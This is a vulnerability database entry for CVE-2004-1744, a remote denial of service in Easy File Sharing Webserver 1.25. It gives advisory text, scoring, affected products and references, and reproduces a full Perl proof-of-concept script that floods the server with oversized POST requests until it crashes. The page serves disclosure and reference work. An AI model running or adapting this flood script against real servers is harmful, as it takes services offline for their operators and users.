CVE-2004-1744
CVSS 5.0
Published: 2004-08-24 00:00:00
Last revised: 2016-10-17 23:00:20

[Original] Easy File Sharing (EFS) Webserver 1.25 allows remote attackers to cause a denial of service (CPU consumption or crash) via many large HTTP requests.


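[CNNVD] Easy File Sharing Web Server remote denial-of-service vulnerability (CNNVD-200408-216)

        Easy File Sharing (EFS) Webserver version 1.25 contains a vulnerability. A remote attacker can cause a denial of service (CPU consumption or crash) by sending many oversized HTTP requests.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)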

cpe:/a:efs_software:efs_web_server:1.25
cpe:/a:efs_software:efs_web_server:1.2

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1744
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1744
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-216
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=109341398102863&w=2
(UNKNOWN)  BUGTRAQ  20040824 Easy File Sharing Webserver v1.25 Vulnerabilities
http://securitytracker.com/id?1011045
(UNKNOWN)  SECTRACK  1011045
http://www.gulftech.org/?node=research&article_id=00045-08242004
(VENDOR_ADVISORY)  MISC  http://www.gulftech.org/?node=research&article_id=00045-08242004
http://www.securityfocus.com/bid/11036
(VENDOR_ADVISORY)  BID  11036
http://xforce.iss.net/xforce/xfdb/17110
(VENDOR_ADVISORY)  XF  easyfilesharing-http-request-dos(17110)

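- Vulnerability information

Easy File Sharing Web Server remote denial-of-service vulnerability
Medium severity  Other
2004-08-24 00:00:00 2006-11-07 00:00:00
Remote
        Easy File Sharing (EFS) Webserver version 1.25 contains a vulnerability. A remote attacker can cause a denial of service (CPU consumption or crash) by sending many oversized HTTP requests.

- Advisories and patches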

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (423)

Easy File Sharing Webserver 1.25 Denial of Service Exploit (EDBID:423)
windows dos
2004-08-27 Verified
0 GulfTech Security
N/A
##################################################### 
# Easy File Sharing Webserver v1.25 Denial Of Service 
# Proof Of Concept Code By GulfTech Security Research 
##################################################### 
# Easy File Sharing Webserver v1.25 will consume 99% 
# of CPU usage until it crashes when sent large req's 
##################################################### 

use IO::Socket; 

print "=====================================================\n". 
      " Easy File Sharing Webserver v1.25 Denial Of Service \n". 
      "=====================================================\n"; 

unless (@ARGV > 1) { die("usage: efswsdos.pl host port"); } 

my $remote_host = $ARGV[0]; 
my $remote_port = $ARGV[1]; 
my $done = "\15\12\15\12"; 
my $buff = "A" x 1000000; 
my $post = "POST /".$buff." HTTP/1.0 ".$done; 

print "\nDoS'ing Server $remote_host Press ctrl+c to stop\n"; 

while ($post) { 
for (my $i=1; $i<10; $i++) { 
my $i = IO::Socket::INET->new( Proto => "tcp", 
      PeerAddr   => $remote_host, 
  PeerPort   => $remote_port, 
      Timeout   => '10000', 
      Type       => SOCK_STREAM, 
      ) || die("\nServer Is Dead!"); 

print $i $post; 
$i->autoflush(1); 
  } 
} 
close $i; 

# milw0rm.com [2004-08-27]
		

- Vulnerability information

9175
Easy File Sharing Web Server HTTP Request Saturation DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

Easy File Sharing Web Server contains a flaw that may allow a remote denial of service. The issue is triggered when a number of large HTTP requests are sent, and will result in loss of availability for the service and possibly the platform by using all available CPU resources.

- Timeline

2004-08-24 Unknown
2004-08-24 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

 

 
